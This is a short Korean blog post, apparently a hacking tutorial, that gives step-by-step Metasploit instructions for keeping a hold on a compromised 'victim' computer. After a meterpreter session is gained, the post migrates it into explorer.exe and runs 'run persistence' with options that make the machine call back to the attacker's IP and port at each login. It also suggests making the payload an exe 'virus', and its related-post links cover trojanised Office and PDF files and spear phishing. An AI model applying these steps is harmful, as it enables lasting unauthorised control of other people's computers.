728x90
1.우선적으로 피해자 컴퓨터를 해킹하여 msf를 이용 세션을 잡아 놓은 상태를 만듭니다.
putty.exe 파일을 바이러스로 만드는경우 프로그램을 종료하면 세션이 닫히기 때문에 exe 바이러스로 하는것이 실습에 좋습니다.
2.migrate [explorer 프로세스 아이디] 명령을 쳐줍니다. 이는 exe파일에 가 있는 세션을 익스플로러 프로세스로 이동시키는 것입니다.
프로세스 아이디는 sessions -i 1 등으로 세션을 잡은 뒤 ps로 검색하여 찾아봅니다.
[persistence 사용시 migrate는 하지 않아도 되나 하는것이 좋습니다.]
3.run persistence -h 를 검색하면 도움말이 나욥니다. -U는 사용자가 로그인시 세션을 재시작하는 옵션입니다.
-p 는 포트번호 -r은 공격자의 내부아이피 주소입니다. -i [숫자] 는 숫자 초 후에 세션을 잡는것입니다.
4.run persistence -U -i [숫자] -p [리스너 포트번호] -r [공격자 아이피 주소] 해당 명령어를 입력해 주면 됩니다.
728x90
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
| MS오피스 문서파일로 악성코드 만들기 (0) | 2023.12.27 |
|---|---|
| 스피어 피싱 공격 [코발트 스트라이크,이메일 파싱] (0) | 2023.12.27 |
| MSF pdf파일을 트로이목마로 만들기 (0) | 2023.12.27 |
| 내가 해킹한 컴퓨터로 다른 컴퓨터 해킹 [코볼트 스트라이크,proxy pivot] (0) | 2023.12.27 |
| 트로이목마 악성코드 분석해보기 [sysinternals 툴] (0) | 2023.12.27 |
